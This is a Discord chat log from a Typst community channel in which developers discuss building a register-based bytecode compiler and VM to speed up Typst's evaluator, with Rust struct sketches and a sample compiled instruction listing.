Performance | Typst | Page 3

left night Jan 15, 2024, 5:31 PM

#

If you're interested I can send it anyway

sturdy sequoia Jan 15, 2024, 5:32 PM

#

left night If you're interested I can send it anyway

I'd love to 😄

left night Jan 15, 2024, 5:34 PM

#

sturdy sequoia I'd love to 😄

As said, it's just a rough draft and the ideas are also far from final. I'm also not yet really 100% sold on the custom vtable thing, but it would definitely unlock some cool stuff.

📎 value-repr.md

tight glade Jan 15, 2024, 7:45 PM

#

Very nice read as well!

I'm wondering, is it always the best option to use span for memoization? or could we do that more subtly when needed for reasons?

I mean, what other information do we have access to at that stage? 🤔

glossy shore Jan 16, 2024, 6:42 AM

#

Wouldn't Arc<(Hash, RestOfData)> already store the hash alongside the refcounts?

#

Call me foolish, but It's All Just One Instruction Anyway™, no?

left night Jan 16, 2024, 9:05 AM

#

glossy shore Wouldn't `Arc<(Hash, RestOfData)>` already store the hash alongside the refcount...

Yeah, right. I was thinking of the other possible optimization where the header is in front of the pointer.

left night Jan 16, 2024, 9:06 AM

#

glossy shore Call me foolish, but It's All Just One Instruction Anyway™, no?

Perhaps, it doesn't make a real difference.

sturdy sequoia Jan 17, 2024, 4:50 PM

#

@left night I kinda want to work on the whole "bytecode" thing, would you be open to that?

left night Jan 17, 2024, 4:56 PM

#

sturdy sequoia <@311948531835469827> I kinda want to work on the whole "bytecode" thing, would ...

I am definitely open to that. I also think that it would be a fun greenfield project with lots of stuff to experiment with.

sturdy sequoia Jan 17, 2024, 4:57 PM

#

left night I am definitely open to that. I also think that it would be a fun greenfield pro...

greenfield?

#

I don't know what that means 💀

left night Jan 17, 2024, 4:57 PM

#

sturdy sequoia greenfield?

https://en.wikipedia.org/wiki/Greenfield_project

#

it's obviously not completely free from existing constraints, but it involves building lots of new free-standing stuff

sturdy sequoia Jan 17, 2024, 5:01 PM

#

Yes, I think I'll start with a fairly basic system that doesn't do any kind of smart checking (like validating args beforehand) to try and make it simpler, then grow the complexity (and performance) as I go along

untold turret Jan 17, 2024, 5:14 PM

#

sturdy sequoia <@311948531835469827> I kinda want to work on the whole "bytecode" thing, would ...

what is the bytecode in typst?

sturdy sequoia Jan 17, 2024, 5:15 PM

#

untold turret what is the bytecode in typst?

it would replace eval with a new pre-compiled bytecode that would hopefully be much faster to evaluate as well as be more memoizable (by not having any spans and things like that)

untold turret Jan 17, 2024, 5:16 PM

#

So there is no bytecode in typst, and you want to make one.

sturdy sequoia Jan 17, 2024, 5:17 PM

#

yes

lunar kettle Jan 17, 2024, 5:18 PM

#

sturdy sequoia it would replace `eval` with a new pre-compiled bytecode that would hopefully be...

so this would only apply to any code that is evaluated with eval or all Typst code?

sturdy sequoia Jan 17, 2024, 5:19 PM

#

lunar kettle so this would only apply to any code that is evaluated with `eval` or all Typst ...

all typst code

#

eval in this case refers to the module inside of the typst source 😄

untold turret Jan 17, 2024, 5:24 PM

#

I was looking at the parallel test branch, but it is not get merged. https://github.com/typst/typst/commit/e0adfc1ded3dedde5f450eb1f0d0dd3cb37cd768
There are tests failed, but I don't know what the failure of that tests means. Could it fixed by some simple patches? What is absent caused failure in there? I don't know at all.

GitHub

Parallel test · typst/typst@e0adfc1

sturdy sequoia Jan 17, 2024, 5:24 PM

#

untold turret I was looking at the parallel test branch, but it is not get merged. https://git...

There are some stuff regarding introspection that just don't work yet on that branch 😦

#

@left night do you know where values are collected? Like joined into one big value for returning 🤨

#

Ah, I found it sorry for the ping

lunar kettle Jan 17, 2024, 5:35 PM

#

sturdy sequoia all typst code

So my understanding is correctly, currently typst code is interpreted by walking through the tree basically, and you want to do something like in Oython where it’s first compiled to Bytecode and then the bytecode gets run instead?

sturdy sequoia Jan 17, 2024, 5:35 PM

#

lunar kettle So my understanding is correctly, currently typst code is interpreted by walking...

yes, because as it turns out, eval is rather slow and happens very often

lunar kettle Jan 17, 2024, 5:36 PM

#

I seee

sturdy sequoia Jan 17, 2024, 5:36 PM

#

The goal being to make eval blazzing fast 🚀 and easier to understand (hopefully)

lunar kettle Jan 17, 2024, 5:36 PM

#

Sounds like a huge undertaking tho haha

sturdy sequoia Jan 17, 2024, 5:36 PM

#

Actually: not that much 😄

lunar kettle Jan 17, 2024, 5:36 PM

#

Would you generate your own bytecode language or are there libraries for that

#

Or how exactly

sturdy sequoia Jan 17, 2024, 5:36 PM

#

Because I just need to traverse the tree and generate OpCodes instead

#

And then eval the opcodes which is fairly simple

lunar kettle Jan 17, 2024, 5:37 PM

#

Icic

sturdy sequoia Jan 17, 2024, 5:37 PM

#

At present it can already do basic operations

lunar kettle Jan 17, 2024, 5:37 PM

#

Well keep us posted 💪

sturdy sequoia Jan 17, 2024, 5:37 PM

#

mind you I am not compiling to bytecode yet

#

My goal is eventually to add (primitive) type checking in it (once we have type validation) and check whether variables, functions, etc. exist

left night Jan 17, 2024, 5:39 PM

#

untold turret I was looking at the parallel test branch, but it is not get merged. https://git...

Parallel layout requires a change to how locations are assigned, which breaks measurement. More details and a possible solution in my recent blog post: https://laurmaedje.github.io/posts/frozen-state/

sturdy sequoia Jan 17, 2024, 5:39 PM

#

Later on we might even be able to optimize the bytecode during eval, but that's wayyyyyy out of scope for my early prototype

left night Jan 17, 2024, 5:40 PM

#

@sturdy sequoia This is more fun than dealing with subtle bugs in the styling system, eh? 😄

sturdy sequoia Jan 17, 2024, 5:41 PM

#

left night <@130737672951037952> This is more fun than dealing with subtle bugs in the styl...

yes 😄

#

The thing is that I don't understand all of the complexity of the styling system so I feel a bit dumb lmao

cunning wadi Jan 17, 2024, 5:42 PM

#

it might be a good idea to do a register based interpreter instead, while you are already rewriting the interpreter

#

that should increase the performance over a stack based vm

sturdy sequoia Jan 17, 2024, 5:43 PM

#

cunning wadi it might be a good idea to do a register based interpreter instead, while you ar...

I must admit I am doing it stack based because it's easier and makes joining output easy: I just join the stack once I'm done 😂

#

#

That's literally how I'm handling producing the output and joining of values

#

and it's dead easy

#

I'll probably remove the Variable stack value mind you

cunning wadi Jan 17, 2024, 5:47 PM

#

I guess for joining with a register based vm, we would simply need a join instruction: JOIN accumulator, return_register

sturdy sequoia Jan 17, 2024, 5:47 PM

#

cunning wadi I guess for joining with a register based vm, we would simply need a join instru...

yes probably

#

how would you handle name and spread arguments tho?

#

My idea currently is that calling a function looks like this: Call(function_id, arg_count) and then I pop arg_count arguments and if they are NamedArgument or SpreadArgument I apply the proper behaviour

#

would you essentially do the same?

#

I'm just not sure I want to deal with the complexity of register based VM 😐

#

because (I think) it'll make the compilation much harder

cunning wadi Jan 17, 2024, 5:49 PM

#

#

here's how lua 5 does it

#

(https://www.lua.org/doc/jucs05.pdf)

sturdy sequoia Jan 17, 2024, 5:49 PM

#

cunning wadi (https://www.lua.org/doc/jucs05.pdf)

great resource, thanks!

#

Hmmm, I see how that leads to a smaller eval indeed

#

It also has the advantage that we don't need to allocate like ever

tight glade Jan 17, 2024, 8:45 PM

#

sturdy sequoia Actually: not that much 😄

Famous last words 😂

sturdy sequoia Jan 17, 2024, 8:45 PM

#

tight glade Famous last words 😂

I said the same thing for gradients didn’t I?

#

angryeyes

tight glade Jan 17, 2024, 8:47 PM

#

You did xD

glossy shore Jan 18, 2024, 9:50 AM

#

sturdy sequoia My idea currently is that calling a function looks like this: `Call(function_id,...

How are you hoping to achieve the big fast with such high-level abstractions

#

We need function signatures to simply not exist at evaltime

#

Oh god that means we will have two entirely distinct compilation passes
terminology is gonna aa

hoary dew Jan 18, 2024, 9:55 AM

#

sturdy sequoia At present it can already do basic operations

What font are you using?

sturdy sequoia Jan 18, 2024, 9:56 AM

#

hoary dew What font are you using?

comic code

sturdy sequoia Jan 18, 2024, 9:57 AM

#

glossy shore Oh god that means we will have two entirely distinct compilation passes terminol...

Yes, function calls would still be a bit slow, but better than the current technique

#

I am now looking into the register-based system that @cunning wadi suggested and I wonder if I can use that to make it faster

#

But obviously, I will need to do a lot of testing and benchmarking to make it work

glossy shore Jan 18, 2024, 10:02 AM

#

sturdy sequoia I am now looking into the register-based system that <@162509247257509888> sugge...

It can really be reduced to

resolve all arguments against the function's signature
compile down to 1 register per argument according to the function's signature, not the call site
give function access to those registers

sly pecan Jan 18, 2024, 11:16 AM

#

sturdy sequoia comic code

master race

sturdy sequoia Jan 18, 2024, 11:19 AM

#

glossy shore It can really be reduced to - resolve all arguments against the function's signa...

yes but the problem is named and optional arguments

#

it's a bit tricky for those

glossy shore Jan 18, 2024, 11:19 AM

#

mmnope

#

named—not any different, just have some canonical ordering
optional—optional is a call site privilege, simply substitute the value in the bytecode

#

though dynamic dispatch is harder.

sturdy sequoia Jan 18, 2024, 12:59 PM

#

@glossy shore my current design is as follows:

The compiler builds a list of instructions (for which each has a span in a second array)
The compiler also builds a list of constants (to avoid cloning and keep instructions copy)
And a list of jump labels
Then an Executor is created which is very lightweight, containing a fixed-size array of register (initially all Value::None)
It executes each instruction one-by-one borrowing as much as possible (to avoid cloning)

#

My instruction set is around 23 instructions so far

#

I'm definitely missing some, for example you cannot build a dict or array at the moment, but I'll add that

#

Cannot do show-set rules either

#

But I'll work on that now

onyx furnace Jan 18, 2024, 1:02 PM

#

bytecode will be the road to jit🤩

sturdy sequoia Jan 18, 2024, 1:03 PM

#

Each instruction is only 8 bytes which imo is perfectly fine

sturdy sequoia Jan 18, 2024, 1:04 PM

#

onyx furnace bytecode will be the road to jit🤩

yesssss

onyx furnace Jan 18, 2024, 1:05 PM

#

sturdy sequoia Cannot do show-set rules either

yes. i also worry about that. jit/bytecode the "pure-compute" part is much easier

sturdy sequoia Jan 18, 2024, 1:05 PM

#

I still think that for now I'll handle arguments and variables as special values that are accessed with an ID

sturdy sequoia Jan 18, 2024, 1:07 PM

#

onyx furnace yes. i also worry about that. jit/bytecode the "pure-compute" part is much easie...

my goal is to turn them into instructions that are similar to function calls but have specific semantics

#

we'll see how that ends up working!

#

the hardest part will be building the compiler itself I think

untold turret Jan 18, 2024, 1:44 PM

#

Also possibility to browser side layout computing? If we can convert the bytecode, we can layout and produces frames by executing the bytecode dynamically in browser, without having to downloading entire 17mb compiler.wasm to client.

#

If the bytecode could be lowered to wasm, we can even use browser native wasm interpreter.

left night Jan 18, 2024, 1:47 PM

#

To lower the bytecode to wasm, it would need to operate on a very low-level basis. I think the planned implementation would continue using all of Typst's data structure and runtime infrastructure, meaning that layout is separate from it.

sturdy sequoia Jan 18, 2024, 1:50 PM

#

left night To lower the bytecode to wasm, it would need to operate on a very low-level basi...

yes indeed, my goal is to make it easy-ish to turn set show labels, etc. into function calls but JIT is still wayy out of scope

untold turret Jan 18, 2024, 1:50 PM

#

left night To lower the bytecode to wasm, it would need to operate on a very low-level basi...

We don't have to convert out a wasm in early stage.

sturdy sequoia Jan 18, 2024, 1:50 PM

#

My goal is a nice performance bump for now

sturdy sequoia Jan 18, 2024, 2:21 PM

#

Do you think it's a good idea to do the following:

Recusirve decent in the tree, each nodes gets compile to an instruction but has a register that keeps increasing every time we need one
Do a second pass once we have collected all of the instructions deduplicating them: essentially once a register is no longer used, mark it as "free" and give the next instruction that needs a register access to it

#

That's essentially a first recursive pass, followed by a second linear pass

#

note that currently locals are stored in a special local store and not in registers, same with arguments. Therefore only values that are not bound are ever stored in registers

sturdy sequoia Jan 18, 2024, 4:09 PM

#

@left night do assignments return a value in typst?

glad urchin Jan 18, 2024, 4:09 PM

#

i believe they return None

sturdy sequoia Jan 18, 2024, 4:09 PM

#

Yes, so in my case they won't return anything

glad urchin Jan 18, 2024, 4:10 PM

#

wdym?

sturdy sequoia Jan 18, 2024, 4:10 PM

#

well in my case, an assignment is just a single instruction

#

it won't store anything in any register

#

because where it's used will automatically and always be a none

glad urchin Jan 18, 2024, 4:10 PM

#

yea but what if the function only has an assignment?

sturdy sequoia Jan 18, 2024, 4:11 PM

#

glad urchin yea but what if the function only has an assignment?

it will apply it and return None automatically

glad urchin Jan 18, 2024, 4:11 PM

#

and what if the assignment is used in an expression?

sturdy sequoia Jan 18, 2024, 4:11 PM

#

glad urchin and what if the assignment is used in an expression?

it'll be None automatically

glad urchin Jan 18, 2024, 4:11 PM

#

well

#

then it does return something in the end

#

:p

sturdy sequoia Jan 18, 2024, 4:12 PM

#

well no, the operator doesn't, it will just get automatically set to a None

#

Basically, register 0 is always a None

#

That way

glad urchin Jan 18, 2024, 4:12 PM

#

well, if you ensure it behaves exactly as it does now, then i dont see a problem

sturdy sequoia Jan 18, 2024, 4:12 PM

#

Join 0 1 1

is easy to detect

#

My goal is to be able to remove useless assignments 😂

#

And useless ops that use a none

glossy shore Jan 19, 2024, 1:42 PM

#

sturdy sequoia Each instruction is only 8 bytes which imo is perfectly fine

Not to criticise your work, but if CPUs can work with 4bytes max isn't that a lot?

glossy shore Jan 19, 2024, 1:42 PM

#

sturdy sequoia well no, the operator doesn't, it will just get automatically set to a None

That can just be the case whenever you can predict the value of an expression beforehand

sturdy sequoia Jan 19, 2024, 3:18 PM

#

Register re-mapping is implemented

#

😎

#

now I just need to finish implementing the VM

#

and it should work?

lunar kettle Jan 19, 2024, 4:21 PM

#

how long do you think itll take? 👀

sturdy sequoia Jan 19, 2024, 4:26 PM

#

lunar kettle how long do you think itll take? 👀

I honestly think it'll be faster than one might expect

#

I ended up being able to re-use a lot of the existing infrastructure so it's not too bad

#

What I mostly need to do is implement the VM, and optimize everything with IDs (which is already mostly the case, I just need to do it for scopes)

#

The one big thing missing right now is that you can't do any kind of scopes, there is only one scope: the global scope

#

However once I'm done, it'll be okay I think

lunar kettle Jan 19, 2024, 4:31 PM

#

keep us posted! :D

#

looking forward to seeing how much speed it ends up gaining

sturdy sequoia Jan 19, 2024, 4:32 PM

#

lunar kettle looking forward to seeing how much speed it ends up gaining

I'm afraid it'll be zero lol

#

One of the big changes mind you is also that I'm turning it from a clone fest to a borrow fest

#

which should help reduce cloning a TON

#

And it should be able to much more agressively memoize compilation

lunar kettle Jan 19, 2024, 5:32 PM

#

sturdy sequoia I'm afraid it'll be zero lol

How so? :(

sturdy sequoia Jan 19, 2024, 5:35 PM

#

lunar kettle How so? :(

I meant I am scared that it might be no gains

#

I don't know yet

#

I'm kind of stuck on closures 💀

lunar kettle Jan 19, 2024, 5:35 PM

#

Maybe it’ll be worse 😂

sturdy sequoia Jan 19, 2024, 5:35 PM

#

lunar kettle Maybe it’ll be worse 😂

https://tenor.com/view/south-park-dude-gif-23750946

Tenor

#

Now that's just mean 😂

#

The main advantage is that it should cache much better, less instructions, etc.

lunar kettle Jan 19, 2024, 5:36 PM

#

https://tenor.com/view/dogs-graph-gif-11019563

Tenor

#

Like that

#

Nah I’m joking

#

I’m sure it’ll be worth it 💪

sturdy sequoia Jan 19, 2024, 5:37 PM

#

I hope so too

#

it's a lot of work 💀

#

and it's nowhere near merge-quality code yet

tight glade Jan 19, 2024, 5:41 PM

#

You know I'd love to review help and document right?

tight glade Jan 19, 2024, 5:41 PM

#

lunar kettle https://tenor.com/view/dogs-graph-gif-11019563

Best meme of the year

sturdy sequoia Jan 19, 2024, 5:49 PM

#

pub struct CompiledClosure {
    /// The span of the closure.
    span: Span,
    /// The instructions that make up the closure.
    instructions: Vec<Instruction>,
    /// The spans of the instructions.
    spans: Vec<Span>,
    /// The captured variables.
    captures: Vec<Capture>,
    /// The default values of the named parameters.
    /// To be loaded into the closure's scope.
    defaults: Vec<Register>,
    /// The number of local variables.
    locals: usize,
    /// The constants of the closure.
    constants: Vec<Value>,
    /// The strings of the closure.
    strings: Vec<String>,
    /// The patterns of the closure.
    patterns: Vec<Pattern>,
    /// The closures of the closure.
    closures: Vec<CompiledClosure>,
}

#

Now that's freaking fat

sly pecan Jan 19, 2024, 5:52 PM

#

Thicc

sturdy sequoia Jan 19, 2024, 7:39 PM

#

About half of the instructions are implemented

feral imp Jan 19, 2024, 7:47 PM

#

If you improve the performance of the typst language, will that improve the performance of the compilation of documents?

sturdy sequoia Jan 19, 2024, 7:49 PM

#

feral imp If you improve the performance of the typst language, will that improve the perf...

massively yes

tight glade Jan 19, 2024, 8:32 PM

#

Is eval a big bottleneck?

onyx furnace Jan 19, 2024, 8:43 PM

#

not really. for oi-wiki, most eval time used is for wasm plugin: generating qrcode. and eval takes about 20%-30%

#

for smaller docs things may become different

#

also might be different for docs which make heavy use of scripting

#

but bytecode and jit is very very cool. i really want to see how it looks like

onyx furnace Jan 19, 2024, 8:47 PM

#

onyx furnace also might be different for docs which make heavy use of scripting

like tablex or cetz? maybe in these doc, eval takes a lot of time

sturdy sequoia Jan 19, 2024, 8:59 PM

#

tight glade Is eval a big bottleneck?

I think a more nuanced answer than @onyx furnace's is:

#

it depends

#

If you use libraries like tablex or codly, have complex templates, or do any sort of compute? yes

#

oi-wiki is really special because it's bottlenecked by the wasmi runtime

#

but most docs I have seen (so far) did have quite a bit of compute and decreasing our reliance on this will definitely help

#

Will it 10x typst's perfs? no

#

Will it 2x them? maybe, depends on the document

sly pecan Jan 19, 2024, 9:01 PM

#

sturdy sequoia Will it 10x typst's perfs? no

Is anything that doesn't 10x performance even worth doing?

sturdy sequoia Jan 19, 2024, 9:01 PM

#

sly pecan Is anything that doesn't 10x performance even worth doing?

Clearly not 😐

sly pecan Jan 19, 2024, 9:02 PM

#

sturdy sequoia Clearly not 😐

Handwritten assembly or riot

sturdy sequoia Jan 19, 2024, 9:02 PM

#

sly pecan Handwritten assembly or riot

... it kind of is 😎

sturdy sequoia Jan 19, 2024, 9:03 PM

#

sly pecan Handwritten assembly or riot

it's indeed a hand-written assembly 😄

#

(well a decent chunk was written by ChatGPT 😂)

sly pecan Jan 19, 2024, 9:06 PM

#

sturdy sequoia it's indeed a hand-written assembly 😄

Inline assembly in rust?

sturdy sequoia Jan 19, 2024, 9:07 PM

#

sly pecan Inline assembly in rust?

no, but it's an assembly

#

and I wrote it by hand

#

so it's hand written assembly

tight glade Jan 19, 2024, 10:09 PM

#

Thanks yous for your answers!

sturdy sequoia Jan 20, 2024, 12:22 PM

#

Ok, so the compiler mostly works, the following code gets compiled into:

= Hello, world!
This is a more complex example.

#lorem(300)

Gets compiled to the following instructions:

consts: [ Space, Text("Hello, World!"), Text("This is a more complex example."), Parbreak, 300]
isrs: [
  Set { register: Register(1), value: ConstId(0) },
  Join { lhs: Register(0), rhs: Register(1), target: Register(0) },
  Set { register: Register(2), value: ConstId(1) },
  Join { lhs: Register(3), rhs: Register(2), target: Register(3) },
  Heading { span: Span(1), level: 1, body: Register(3), target: Register(4) },
  Join { lhs: Register(0), rhs:   Register(4), target: Register(0) },
  Set { register: Register(5), value: ConstId(0) },
  Join { lhs: Register(0), rhs: Register(5), target: Register(0) },
  Set { register: Register(6), value: ConstId(2) },
  Join { lhs: Register(0), rhs: Register(6), target: Register(0) },
  Set { register: Register(7), value: ConstId(3) },
  Join { lhs: Register(0), rhs: Register(7), target: Register(0) },
  LoadModule { module: ModuleId(0), local: LocalId(58), target: Register(8) },
  Args { target: Register(9) },
  Set { register: Register(10), value: ConstId(4) },
  ArgsPush { args: Register(9), value: Register(10) },
  Call { callee: Register(8), args: Register(9), target: Register(11), math: false, trailing_comma: false },
  Join { lhs: Register(0), rhs: Register(11), target: Register(0) },
  Set { register: Register(12), value: ConstId(0) },
  Join { lhs: Register(0), rhs: Register(12), target: Register(0) }
]

#

What do y'all think?

#

(especially @left night @onyx furnace @tight glade @glossy shore and others that were interested like @sly pecan)

#

As you can see all names, etc. are completely removed instead using indices to try and make accesses much faster

untold turret Jan 20, 2024, 12:30 PM

#

sturdy sequoia Ok, so the compiler mostly works, the following code gets compiled into: ```ts =...

Is control flow already supported?

sturdy sequoia Jan 20, 2024, 12:30 PM

#

untold turret Is control flow already supported?

yes

#

chadYES

sly pecan Jan 20, 2024, 12:32 PM

#

sturdy sequoia (especially <@311948531835469827> <@408824262015713281> <@553622654163353610> <@...

It's funny to me that you think I would understand anything of this 😀

sturdy sequoia Jan 20, 2024, 12:34 PM

#

untold turret Is control flow already supported?

The only thing that are currently not supported:

Show/Set rules
Importing/Including modules
Scoping, it currently only supports scoping for closures/functions but not blocks of code/content

#

Otherwise pretty much is implemented

#

show set rules I plan on supporting using a rule stack that changes the behaviour of the Join instruction because it's the easiest

#

And scoping is more about me being lazy 😂

onyx furnace Jan 20, 2024, 12:42 PM

#

how many registers do we have?

sturdy sequoia Jan 20, 2024, 12:43 PM

#

onyx furnace how many registers do we have?

Currently 32, but I don't know how many we really need

onyx furnace Jan 20, 2024, 12:43 PM

#

sturdy sequoia The only thing that are currently not supported: - Show/Set rules - Importing/In...

you are surprisingly fast!

#

does the number of regs matter? I dont know about bytecode design but I feels like there is not a 1:1 mapping between logical regs and physical ones

#

And I think we also have a memory?(If we use up all the regs)

sturdy sequoia Jan 20, 2024, 12:45 PM

#

onyx furnace does the number of regs matter? I dont know about bytecode design but I feels li...

I mean yes because it's how much stack size and memory it will use

#

But apart from that, not really

untold turret Jan 20, 2024, 12:45 PM

#

I think they all are in memory. And we may not have to bind them to physical registers in initial impl.

sturdy sequoia Jan 20, 2024, 12:46 PM

#

untold turret I think they all are in memory. And we may not have to bind them to physical reg...

It's unlikely we could because there's quite a bit of state in the VM atm in addition to the register themselves

#

the instructions are quite high level in order to reuse as much as possible

onyx furnace Jan 20, 2024, 12:48 PM

#

Would it be better if we have exactly 0 reg and only relies on stack? And we may do clever reg allocation things after we want to JIT/compile to native code.

sturdy sequoia Jan 20, 2024, 12:48 PM

#

pub struct Executor<'a> {
    /// The instructions to execute.
    instructions: &'a [Instruction],
    /// The spans in the instruction set.
    spans: &'a [Span],
    /// The labels in the instruction set.
    labels: &'a [usize],
    /// The constants in the instruction set.
    constants: &'a [Value],
    /// The closures in the instruction set.
    closures: &'a [CompiledClosure],
    /// The strings in the instruction set.
    strings: &'a [EcoString],
    /// The scopes used in the instruction set.
    scopes: Scopes<'a>,
    /// The locals used in the instruction set.
    locals: Vec<Value>,
    /// The captured locals used in the instruction set.
    captured: &'a [Value],
    /// The arguments used in the instruction set.
    arguments: &'a [Value],
    /// The current register table.
    registers: RegisterTable,
}


#[derive(Clone, Debug, PartialEq, Hash, Default)]
pub struct RegisterTable {
    pub registers: [Value; REGISTER_COUNT as usize],
}

sturdy sequoia Jan 20, 2024, 12:48 PM

#

onyx furnace Would it be better if we have exactly 0 reg and only relies on stack? And we may...

The idea of having registers instead of a stack is that it leads to less instructions and (hopefully) faster execution

#

Additionally, it makes the compiler insanely easy to write 😂

onyx furnace Jan 20, 2024, 12:50 PM

#

sounds like cisc vs risc😂

sturdy sequoia Jan 20, 2024, 12:52 PM

#

onyx furnace sounds like cisc vs risc😂

oh, it's a CISC 😂

#

Some instructions run a TON of code behind the scene lol

sly pecan Jan 20, 2024, 12:52 PM

#

HISC

sturdy sequoia Jan 20, 2024, 12:53 PM

#

Especially closure initialization

sly pecan Jan 20, 2024, 12:53 PM

#

humongous instruction set computer

sturdy sequoia Jan 20, 2024, 12:53 PM

#

sly pecan humongous instruction set computer

there's only around 50 instructions 😄

#

But each instruction is 32 bytes

untold turret Jan 20, 2024, 12:54 PM

#

sturdy sequoia Currently 32, but I don't know how many we really need

We may simply have infinite registers, and determine it then by the thesis. 😂

sturdy sequoia Jan 20, 2024, 12:54 PM

#

untold turret We may simply have infinite registers, and determine it then by the thesis. 😂

I think 32 should be fine 😂

#

maybe 64 but no more

#

note that currently locals are not stored in registers (which I admit is a bit weird)

#

My plan is to convert locals to registers soon™️

#

But I'd like the whole thing to work and be debugged first

untold turret Jan 20, 2024, 12:58 PM

#

Make instructions having infinite registers brings benefits to static analysis. I don't know whether it introduces overhead to bytecode compiler.

sturdy sequoia Jan 20, 2024, 12:58 PM

#

untold turret Make instructions having infinite registers brings benefits to static analysis. ...

to the compiler: no

#

currently the compiler actually uses infinite register then does a second pass to reuse registers and optimize

#

My goal with this is mostly to avoid using too much memory and to avoid allocating

#

but we could definitely do this but not put a hard-cap on the number of registers

untold turret Jan 20, 2024, 12:59 PM

#

Sounds good

sturdy sequoia Jan 20, 2024, 1:00 PM

#

Like optimizing without limiting to 32 registers

#

My goal is also (maybe) to have multiple sizes of register pages and depending on the function use a bigger or smaller one among multiple sizes

#

to try and be as cache and memory efficient as possible

untold turret Jan 20, 2024, 1:01 PM

#

We may also have comemo on executing blocks.

#

And using Defer<T> to send a sufficient big instructions batch to another thread to execute...

tight glade Jan 20, 2024, 1:04 PM

#

Like we could start by allocating 32 registers but grow as needed! I can take a deeper look this evening, where can i take a look at the implementation? ❤️

sturdy sequoia Jan 20, 2024, 1:04 PM

#

tight glade Like we could start by allocating 32 registers but grow as needed! I can take a ...

I haven't pushed it yet :-p

sturdy sequoia Jan 20, 2024, 1:04 PM

#

untold turret We may also have comemo on executing blocks.

that's my plan indeed 😄

untold turret Jan 20, 2024, 1:04 PM

#

Many crazy optimization..

tight glade Jan 20, 2024, 1:05 PM

#

Istrs 😬

#

At that point just instructions 😂

tight glade Jan 20, 2024, 1:08 PM

#

untold turret We may simply have infinite registers, and determine it then by the thesis. 😂

By the thesis is my new expression ❤️

untold turret Jan 20, 2024, 1:09 PM

#

tight glade Like we could start by allocating 32 registers but grow as needed! I can take a ...

Wait, are you going to write bytecode manually in source code? Or what is as needed in this sentence.

sly pecan Jan 20, 2024, 1:15 PM

#

tight glade By the thesis is my new expression ❤️

😦

sturdy sequoia Jan 20, 2024, 1:15 PM

#

sly pecan 😦

I want to see that now lol

tight glade Jan 20, 2024, 2:00 PM

#

sly pecan 😦

Rewrite it in typst

#

Skillissue chat gpt

tight glade Jan 20, 2024, 2:01 PM

#

untold turret Wait, are you going to write bytecode manually in source code? Or what is as nee...

The bytecode is being written manually by dherse now in typst code base yea

#

But typst users will never see it

sturdy sequoia Jan 20, 2024, 2:19 PM

#

@untold turret @onyx furnace I actually really like the idea of having a variable number of registers, because it also removes the need to distinguish between: locals, captured, and arguments as being "special" cases which simplifies everything

#

So I think that as soon as it all works, I'll be implementing that way 😉

untold turret Jan 20, 2024, 2:23 PM

#

If we don't target to utilize physical registers in "part 1", I think it is a really good decision. But I heard you had restricted it, so I thought the limiting registers is easy.

sturdy sequoia Jan 20, 2024, 2:24 PM

#

untold turret If we don't target to utilize physical registers in "part 1", I think it is a re...

it's easy to limit them because a lot of values are not in registers but in special storages (like local variables, arguments, and captured values)

#

but if all of those need to be in registers, it makes the compilation much harder

#

because you'll need to reorder things just to make room

#

or have a stack

left night Jan 20, 2024, 3:02 PM

#

sturdy sequoia Ok, so the compiler mostly works, the following code gets compiled into: ```ts =...

Would it make sense to compile content blocks to a special template instruction rather than a lot of set + join? That way we can allocate space for the sequence beforehand and have less overhead in joining and Arc::get_mut.

sturdy sequoia Jan 20, 2024, 3:06 PM

#

left night Would it make sense to compile content blocks to a special template instruction ...

that's exactly what I am changing to 😉

#

I was already doing it because handling styles was basically impossible

#

The way it works is as follows:

Each markup, block, etc. creates a join group, when in a join group, the Join instruction basically appends the value to the group (which is pre-allocated to a size close enough to the output)
When a markup, block, etc. ends, it pops the join group saving it to a register (as one big content)
Whenever a style rule is encountered, it does the same but pushes it into a StyledElem instead (so a special kind of join group).

#

If a join group is empty, it just produces an empty sequence elem, etc.

#

My idea is that we can therefore pre-allocate a lot, and then we can just build the sequence from the arrays (EcoVec) directly

#

Additionally, I have some smart to handle subsequent show and set rules where they get collected into a single Styles to try and save memory and decrease the depth of the finaly Content tree

#

I plan on writing a LOT of docs in the module to explain how it all works, as well as I have commented basically every line of the compiler

#

Because the VM is actually quite complex, but this complexity is really aimed at improving performance

#

I also need to make the compiler use TrackedMut<Compiler> that way I can just #[comemo::memoize] each block 😄

left night Jan 20, 2024, 3:14 PM

#

sturdy sequoia I also need to make the compiler use `TrackedMut<Compiler>` that way I can just ...

Do you mean each individual [..] and {..} block?

sturdy sequoia Jan 20, 2024, 3:15 PM

#

left night Do you mean each individual `[..]` and `{..}` block?

Not sure yet, but maybe

#

I might just have two functions one which isn't memoized and based on the size then decide which one to take

left night Jan 20, 2024, 3:16 PM

#

When a block has a lot of assignments, the mutable constraints will probably tank performance. If it's mostly pure, it could be okay.

sturdy sequoia Jan 20, 2024, 3:16 PM

#

left night When a block has a lot of assignments, the mutable constraints will probably tan...

Actually, I am not handling remote assignment and mutable methods yet 💀

#

Because it sounds... hard

left night Jan 20, 2024, 3:17 PM

#

What's remote assignment?

sturdy sequoia Jan 20, 2024, 3:17 PM

#

remote assignments = assignments in a parent scope

left night Jan 20, 2024, 3:17 PM

#

ah

sturdy sequoia Jan 20, 2024, 3:17 PM

#

can a closure do a mutable assignment (in the parent scope)?

#

I hope not 😄

left night Jan 20, 2024, 3:17 PM

#

Overall, I think caching less and smarter (not even every function call) might be more the way to go. Less hashing, lookup, constraint, and memory overhead

left night Jan 20, 2024, 3:17 PM

#

sturdy sequoia can a closure do a mutable assignment (in the parent scope)?

No, that would be impure

sturdy sequoia Jan 20, 2024, 3:17 PM

#

left night No, that would be impure

Thank you

#

'cause I was worried 😂

#

Then mutable assignments should be relatively easy

#

Just need a Scopes::enter and Scopes::exit call and then it's good 😄

left night Jan 20, 2024, 3:21 PM

#

sturdy sequoia But each instruction is 32 bytes

did it grow from 8 bytes to 32 bytes?

glossy shore Jan 20, 2024, 3:24 PM

#

sturdy sequoia But each instruction is 32 bytes

🙀

glossy shore Jan 20, 2024, 3:25 PM

#

sturdy sequoia What do y'all think?

I wonder why we have to load a module as a value? Couldn't that stay outside of runtime

left night Jan 20, 2024, 3:26 PM

#

perhaps, it'd be worthwhile to do more struct-of-arrays? a Vec<u8> with opcodes and then one supplemental maybe Vec<u32> for common index arguments and then something for rarer arguments. but it starts complicating things more.

#

By the way, I suspect import "..": * is gonna be a pain to implement

#

Right now the imported string can even be dynamic, but I'm thinking about forbidding that. For import, I think almost nobody uses it, but for include some people do. Not sure.

#

